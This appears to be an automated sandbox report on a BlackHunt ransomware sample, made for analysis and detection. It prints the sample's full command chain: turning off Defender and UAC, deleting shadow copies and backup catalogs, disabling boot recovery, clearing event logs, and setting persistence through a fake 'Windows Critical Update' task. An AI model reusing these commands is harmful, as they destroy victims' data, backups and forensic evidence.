626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 114 PID 4004 wrote to memory of 2036 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 114 PID 4004 wrote to memory of 1496 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 118 PID 4004 wrote to memory of 1496 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 118 PID 4004 wrote to memory of 3364 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 119 PID 4004 wrote to memory of 3364 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 119 PID 4004 wrote to memory of 3188 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 123 PID 4004 wrote to memory of 3188 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 123 PID 4004 wrote to memory of 4276 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 124 PID 4004 wrote to memory of 4276 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 124 PID 4004 wrote to memory of 220 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 126 PID 4004 wrote to memory of 220 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 126 PID 1940 wrote to memory of 5032 1940 cmd.exe 127 PID 1940 wrote to memory of 5032 1940 cmd.exe 127 PID 1264 wrote to memory of 1804 1264 vssadmin.exe 129 PID 1264 wrote to memory of 1804 1264 vssadmin.exe 129 PID 2684 wrote to memory of 1244 2684 cmd.exe 131 PID 2684 wrote to memory of 1244 2684 cmd.exe 131 PID 4004 wrote to memory of 4624 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 130 PID 4004 wrote to memory of 4624 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 130 PID 4004 wrote to memory of 2344 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 132 PID 4004 wrote to memory of 2344 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 132 PID 4004 wrote to memory of 3004 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 137 PID 4004 wrote to memory of 3004 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 137 PID 4004 wrote to memory of 1152 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 136 PID 4004 wrote to memory of 1152 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 136 PID 4004 wrote to memory of 4492 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 135 PID 4004 wrote to memory of 4492 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 135 PID 4004 wrote to memory of 3700 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 142 PID 4004 wrote to memory of 3700 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 142 PID 3632 wrote to memory of 1016 3632 cmd.exe 143 PID 3632 wrote to memory of 1016 3632 cmd.exe 143 PID 4004 wrote to memory of 3404 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 145 PID 4004 wrote to memory of 3404 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 145 PID 4848 wrote to memory of 968 4848 cmd.exe 146 PID 4848 wrote to memory of 968 4848 cmd.exe 146 PID 4004 wrote to memory of 3840 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 147 PID 4004 wrote to memory of 3840 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 147 PID 4004 wrote to memory of 3808 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 149 PID 4004 wrote to memory of 3808 4004 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 149 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe"C:\Users\Admin\AppData\Local\Temp\626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4004 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵PID:1264
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:1804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:5032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:1244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4848 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:3320
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:4344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:3652
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:4308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:3740
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:5248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:3972
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:5180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:764
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:5200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3632 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:4300
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:5556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2036
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:11132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:4596
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:5424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1496
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:11152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:3364
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:9396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:3188
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:11140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:4276
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:9136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:220
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:9128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:4624
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:7384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2344
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:7648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4492
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:8080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1152
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:7624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:3004
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:6408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:3700
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:8172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:3404
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:6976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3840
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3808
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:7332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:4372
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4900
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:10292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe" /F2⤵PID:1692
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe" /F3⤵
- Creates scheduled task(s)
PID:10556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:5264
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:10568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:5312
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:10576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:5404
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:6512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:5500
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:10528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:5488
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:6752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:5636
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:6712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:5384
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:10328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:5360
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
- Suspicious use of WriteProcessMemory
PID:1264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:5344
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:10724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:5676
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:11260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:7868
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:13872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:13940
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:9256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:9568
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:10024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:9264
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:11668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:15248
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:14036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:10000
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:10372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:8320
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:11228
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe"2⤵PID:7324
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:3900
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:11984
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:10044
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:8196
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:11280
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:11316
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:5988
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:13460
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1028
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:14196
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:13992
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:7524
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:10196
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:13620
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:13560
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7156
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:12812
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:14252
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:7500
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:10616
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f1⤵PID:7912
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7232
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt1⤵PID:5384
-
